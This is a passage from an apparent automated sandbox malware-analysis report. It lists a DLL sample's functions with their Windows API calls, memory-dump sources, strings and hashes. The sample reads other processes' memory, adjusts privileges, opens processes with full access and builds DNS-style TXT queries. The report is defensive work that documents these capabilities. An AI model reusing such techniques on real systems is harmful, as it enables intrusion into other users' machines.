                                                                                                                                        • Part of subcall function 69EA0D20: LoadLibraryA.KERNEL32 ref: 69EA0D40
                                                                                                                                        • Part of subcall function 69EA0D20: GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 69EA0D52
                                                                                                                                        • Part of subcall function 69EA0D20: ReadProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000000), ref: 69EA0D6E
                                                                                                                                        • Part of subcall function 69EA0D20: FreeLibrary.KERNEL32(00000000), ref: 69EA0D85
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0060B92C,?,00000004,?,?,?,?,?,?,69E83F05), ref: 69EA0FDD
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0060B931,?,00000004,?), ref: 69EA0FFC
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0060B96D,?,00000004,?,?,?,?,?,?,69E83F05), ref: 69EA1022
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,69E83F05), ref: 69EA1035
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead$CloseHandleLibrary$AddressFreeLoadProc
                                                                                                                                      • String ID: f$h
                                                                                                                                      • API String ID: 2902095161-26895948
                                                                                                                                      • Opcode ID: dfa78d0a58719860c0a0adde2b104a4a567c7dedcac404cda30d249b9c0be945
                                                                                                                                      • Instruction ID: c2e0f69879f85c56ff8b32d2cf8e4eeae0fed60c1decbbca164b77bbcfcd8e65
                                                                                                                                      • Opcode Fuzzy Hash: dfa78d0a58719860c0a0adde2b104a4a567c7dedcac404cda30d249b9c0be945
                                                                                                                                      • Instruction Fuzzy Hash: 3241086154C3869BE310DA688C41E7B7A98BF86754F140B1DF6F09A2E1E760D60D83E3
                                                                                                                                      Function 69E9E7B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,69E9F4C3), ref: 69E9E7C5
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,69E9F4C3), ref: 69E9E7D5
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,69E9F4C3), ref: 69E9E7E3
                                                                                                                                      • _malloc.LIBCMT ref: 69E9E7F4
                                                                                                                                      • CloseHandle.KERNEL32(00000000,69E9F4C3), ref: 69E9E803
                                                                                                                                      • _memset.LIBCMT ref: 69E9E817
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,69E9F4C3), ref: 69E9E82D
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,69E9F4C3), ref: 69E9E834
                                                                                                                                        • Part of subcall function 69EC0763: __lock.LIBCMT ref: 69EC0781
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_find_block.LIBCMT ref: 69EC078C
                                                                                                                                        • Part of subcall function 69EC0763: ___sbh_free_block.LIBCMT ref: 69EC079B
                                                                                                                                        • Part of subcall function 69EC0763: RtlFreeHeap.NTDLL(00000000,?,69EE8B60,0000000C,69EC7D3E,00000000,69EE8F08,0000000C,69EC7D78,?,?,?,69ED1AC7,00000004,69EE9288,0000000C), ref: 69EC07CB
                                                                                                                                        • Part of subcall function 69EC0763: GetLastError.KERNEL32(?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001,00000214), ref: 69EC07DC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                                                                      • String ID: PEC2
                                                                                                                                      • API String ID: 357344292-2409353939
                                                                                                                                      • Opcode ID: 4c5a13591d33863fd1196a761ac56bfea3bad281b21f7f9168195c64faba1d76
                                                                                                                                      • Instruction ID: 8d2a1b85c9a965152721f069252bb83769e97ecd76e333a6a5a3ff20a0e53c75
                                                                                                                                      • Opcode Fuzzy Hash: 4c5a13591d33863fd1196a761ac56bfea3bad281b21f7f9168195c64faba1d76
                                                                                                                                      • Instruction Fuzzy Hash: 4A314632A5454076F3324660AD8ABBE3B67FB4332AF3C446DF796E62C0DB6195458282
                                                                                                                                      Function 69EA0BD0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA0BF8
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?), ref: 69EA0C3A
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 69EA0C4E
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 69EA0C5F
                                                                                                                                      • _malloc.LIBCMT ref: 69EA0C6B
                                                                                                                                      • _memset.LIBCMT ref: 69EA0C7D
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 69EA0C8F
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 69EA0C96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHandle_memset$Close$AddressCreateModuleProcReadSize_malloc
                                                                                                                                      • String ID: A3M2
                                                                                                                                      • API String ID: 2428753672-2848054085
                                                                                                                                      • Opcode ID: 28a4ebe6478728e02925421bfd2bdb54c64927a8a2d2afe3610c703beefe2f5b
                                                                                                                                      • Instruction ID: 57d86cf258b337f8687a9a662064aebe85101894325231673dc4a1b3ab8352f7
                                                                                                                                      • Opcode Fuzzy Hash: 28a4ebe6478728e02925421bfd2bdb54c64927a8a2d2afe3610c703beefe2f5b
                                                                                                                                      • Instruction Fuzzy Hash: 66319E75E403006BE711D7249E86FEF32D9AF47725F20443DFA568A2C1EB78950C82A3
                                                                                                                                      Function 69EBA728 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 69EBA72F
                                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 69EBA73E
                                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 69EBA798
                                                                                                                                        • Part of subcall function 69EB95EB: GetWindowRect.USER32(?,10000000), ref: 69EB9615
                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 69EBA7BF
                                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 69EBA7C7
                                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 69EBA7CE
                                                                                                                                      • GlobalDeleteAtom.KERNEL32(?), ref: 69EBA7D8
                                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 69EBA82C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                                      • API String ID: 2109165785-1060338832
                                                                                                                                      • Opcode ID: 21ccc2d8e23bde0e76191fbd97dab0b0f772ada742cbf914c8efacc9198e92a9
                                                                                                                                      • Instruction ID: 23f421636ba1596453ee20201d2fc5da87aaa9bafc0afee2a3b1fdcbc4f5b04d
                                                                                                                                      • Opcode Fuzzy Hash: 21ccc2d8e23bde0e76191fbd97dab0b0f772ada742cbf914c8efacc9198e92a9
                                                                                                                                      • Instruction Fuzzy Hash: B931817688015ABBCF029FA4DF49DBF3EB9FF0A325F204019F501A9154D7358A15DBA1
                                                                                                                                      Function 69E883D0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 40COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E8B440: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,69EF2C98), ref: 69E8B4EA
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E88424
                                                                                                                                      • OutputDebugStringA.KERNEL32(wrong list), ref: 69E8843E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E88445
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$CriticalInitializeSection__wfopen_s
                                                                                                                                      • String ID: C:\debug.txt$loser.rar$loser32.rar$loser64.rar$loser64_2.rar$wrong list
                                                                                                                                      • API String ID: 871686837-3570089105
                                                                                                                                      • Opcode ID: 9b71a0d574dedb19b40c48716d8b8915f92e382305141c158072b1dfb547f852
                                                                                                                                      • Instruction ID: 84a77704739ffae1379c09fd05ce78bfe09de044930c8332ad935b50dc22e09d
                                                                                                                                      • Opcode Fuzzy Hash: 9b71a0d574dedb19b40c48716d8b8915f92e382305141c158072b1dfb547f852
                                                                                                                                      • Instruction Fuzzy Hash: 2BF0C879D2020466C700E7F4AD0179E72906F44248FB0EC1EE41C9F192FF39940DD653
                                                                                                                                      Function 69E8C6A0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 252synchronizationCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E8C6CE
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E8C6FE
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,69E8A84F,?,?,?,?,69E8A96D), ref: 69E8C70E
                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,00000000,69E8A84F,?,?,?,?,69E8A96D), ref: 69E8C7F9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateCreateEventHeapObjectSingleWait_malloc_memset
                                                                                                                                      • String ID: &type=A$&type=TXT
                                                                                                                                      • API String ID: 833579502-2485464723
                                                                                                                                      • Opcode ID: 28f6d1d30172ee03ef80277da55af9b6b69af168de4d7790abcef2071eb275bc
                                                                                                                                      • Instruction ID: edabeef2bbf7a434c1a245b410baaf61cc00ebb83474440088f176ff282596a4
                                                                                                                                      • Opcode Fuzzy Hash: 28f6d1d30172ee03ef80277da55af9b6b69af168de4d7790abcef2071eb275bc
                                                                                                                                      • Instruction Fuzzy Hash: F391EF757447019FD704CF68CA41B6AB7E4FF86328F20876DE49A9B390DB34A9068B91
                                                                                                                                      Function 69EA1050 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 215COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • _memset.LIBCMT ref: 69EA10A5
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00530000,?,00040000,?,?,00000000,0003FFFF,69EA30F9,?), ref: 69EA10C8
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,005B0000,?,00040000,?), ref: 69EA11B7
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00510000,?,00040000,?), ref: 69EA12A4
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA1381
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$Process$ReadVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege_memset
                                                                                                                                      • String ID: 8$E$}
                                                                                                                                      • API String ID: 1110381803-3509493567
                                                                                                                                      • Opcode ID: bc154b92e941e4dc4700ea55270a6d907970ca36e7e6af6cca0189a05379d1e9
                                                                                                                                      • Instruction ID: 0bea7df0e23c6d32d1327bec23fcff54a2203c0622dbcfec5eea5645629ea119
                                                                                                                                      • Opcode Fuzzy Hash: bc154b92e941e4dc4700ea55270a6d907970ca36e7e6af6cca0189a05379d1e9
                                                                                                                                      • Instruction Fuzzy Hash: 8FA1B42104D7C1D9D362C63C489478FBED51FBB228F881B8EF1E45B2D2D2658609C3AB
                                                                                                                                      Function 69EA26B0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 207COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA26DF
                                                                                                                                      • _memset.LIBCMT ref: 69EA26FE
                                                                                                                                      • _memset.LIBCMT ref: 69EA271D
                                                                                                                                        • Part of subcall function 69E9FA60: _memset.LIBCMT ref: 69E9FA8E
                                                                                                                                        • Part of subcall function 69EA1CA0: ReadProcessMemory.KERNEL32 ref: 69EA1D1C
                                                                                                                                        • Part of subcall function 69EA1CA0: CloseHandle.KERNEL32(00000000), ref: 69EA2221
                                                                                                                                        • Part of subcall function 69E9D870: _memset.LIBCMT ref: 69E9D8F4
                                                                                                                                        • Part of subcall function 69E9D870: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 69E9D906
                                                                                                                                        • Part of subcall function 69E9D870: Module32First.KERNEL32 ref: 69E9D920
                                                                                                                                        • Part of subcall function 69E9D870: Module32Next.KERNEL32(00000000,?), ref: 69E9D979
                                                                                                                                        • Part of subcall function 69E9D870: CloseHandle.KERNEL32(00000000), ref: 69E9D983
                                                                                                                                        • Part of subcall function 69E9D870: CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?), ref: 69E9D9D7
